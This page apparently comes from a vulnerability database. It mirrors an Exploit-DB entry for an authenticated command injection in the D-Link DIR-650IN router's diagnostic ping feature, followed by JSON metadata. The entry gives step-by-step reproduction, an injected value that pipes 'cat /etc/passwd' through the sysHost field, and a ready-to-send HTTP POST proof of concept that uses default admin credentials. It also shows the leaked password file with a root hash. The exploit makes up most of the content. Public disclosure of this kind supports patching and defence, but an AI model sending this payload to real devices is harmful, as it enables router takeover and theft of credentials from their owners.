D-Link DIR-650IN – Authenticated Command Injection_EDB-ID:52508

Description

Exploit Title: D-Link DIR-650IN - Authenticated Command Injection Date: 2023-01-08 Exploit Author: Sanjay Singh Vendor Homepage: https://www.dlink.com Software Link: https://dlinkmea.com/index.php/product/details?det=T082aVdUWUFNR2FRblBBQUxMWlVTZz09...

Visit Original Source

Basic Information

ID EDB-ID:52508

Published Apr 10, 2026 at 00:00

Affected Product

Affected Versions # Exploit Title: D-Link DIR-650IN - Authenticated Command Injection
# Date: 2023-01-08
# Exploit Author: Sanjay Singh
# Vendor Homepage: https://www.dlink.com
# Software Link: https://dlinkmea.com/index.php/product/details?det=T082aVdUWUFNR2FRblBBQUxMWlVTZz09
# Version: Firmware V1.04 (REQUIRED)
# Tested on: DIR-650IN Web UI (Boa/0.94.14rc21), Windows 10 / Chrome 108
# CVE: N/A (Version included now, previously missing)

Description:
The D-Link DIR-650IN Wireless N300 Router is vulnerable to an Authenticated Command Injection vulnerability in the Diagnostic (Ping / Traceroute) functionality.

The parameter sysHost is not sanitized, allowing an authenticated attacker (even with low-privilege access) to inject OS commands. Exploitation leads to full compromise of the router, including reading sensitive system files such as /etc/passwd.

Steps to Reproduce:
1. Log in to the router web interface.
2. Go to Management → Diagnostic.
3. Select Ping or Traceroute.
4. Enter: google.com | cat /etc/passwd
5. Click Apply.
6. Output includes /etc/passwd contents.

HTTP PoC:
POST /boafrm/formSysCmd HTTP/1.1
Host: 192.168.0.1
Authorization: Basic YWRtaW46YWRtaW4=
Content-Type: application/x-www-form-urlencoded

submit-url=%2Fsyscmd.htm&sysCmd=ping&sysCmdType=ping&checkNum=5&sysHost=google.com%7Ccat%20/etc/passwd&apply=Apply

Response Extract:
root:XEOFcsRJLyXbQ:0:0:root:/:/bin/sh
nobody:x:0:0:nobody:/:/dev/null

References:
https://www.dlink.com
https://dlinkmea.com/index.php/product/details?det=T082aVdUWUFNR2FRblBBQUxMWlVTZz09

{
    "lastseen": "2026-04-10T16:07:51",
    "description": "Exploit Title: D-Link DIR-650IN - Authenticated Command Injection Date: 2023-01-08 Exploit Author: Sanjay Singh Vendor Homepage: https://www.dlink.com Software Link: https://dlinkmea.com/index.php/product/details?det=T082aVdUWUFNR2FRblBBQUxMWlVTZz09...",
    "published": "2026-04-10T00:00:00",
    "modified": "2026-04-10T00:00:00",
    "type": "exploitdb",
    "title": "D-Link DIR-650IN - Authenticated Command Injection",
    "source": "",
    "references": "",
    "id": "EDB-ID:52508",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [],
    "sourceData": "# Exploit Title: D-Link DIR-650IN - Authenticated Command Injection\r\n# Date: 2023-01-08\r\n# Exploit Author: Sanjay Singh\r\n# Vendor Homepage: https://www.dlink.com\r\n# Software Link: https://dlinkmea.com/index.php/product/details?det=T082aVdUWUFNR2FRblBBQUxMWlVTZz09\r\n# Version: Firmware V1.04 (REQUIRED)\r\n# Tested on: DIR-650IN Web UI (Boa/0.94.14rc21), Windows 10 / Chrome 108\r\n# CVE: N/A (Version included now, previously missing)\r\n\r\nDescription:\r\nThe D-Link DIR-650IN Wireless N300 Router is vulnerable to an Authenticated Command Injection vulnerability in the Diagnostic (Ping / Traceroute) functionality.\r\n\r\nThe parameter sysHost is not sanitized, allowing an authenticated attacker (even with low-privilege access) to inject OS commands. Exploitation leads to full compromise of the router, including reading sensitive system files such as /etc/passwd.\r\n\r\nSteps to Reproduce:\r\n1. Log in to the router web interface.\r\n2. Go to Management \u2192 Diagnostic.\r\n3. Select Ping or Traceroute.\r\n4. Enter: google.com | cat /etc/passwd\r\n5. Click Apply.\r\n6. Output includes /etc/passwd contents.\r\n\r\nHTTP PoC:\r\nPOST /boafrm/formSysCmd HTTP/1.1\r\nHost: 192.168.0.1\r\nAuthorization: Basic YWRtaW46YWRtaW4=\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\nsubmit-url=%2Fsyscmd.htm&sysCmd=ping&sysCmdType=ping&checkNum=5&sysHost=google.com%7Ccat%20/etc/passwd&apply=Apply\r\n\r\nResponse Extract:\r\nroot:XEOFcsRJLyXbQ:0:0:root:/:/bin/sh\r\nnobody:x:0:0:nobody:/:/dev/null\r\n\r\nReferences:\r\nhttps://www.dlink.com\r\nhttps://dlinkmea.com/index.php/product/details?det=T082aVdUWUFNR2FRblBBQUxMWlVTZz09",
    "sourceHref": "https://www.exploit-db.com/raw/52508",
    "cvss": {
        "score": 0,
        "severity": "NONE",
        "vector": "NONE",
        "version": "NONE"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://www.exploit-db.com/exploits/52508",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply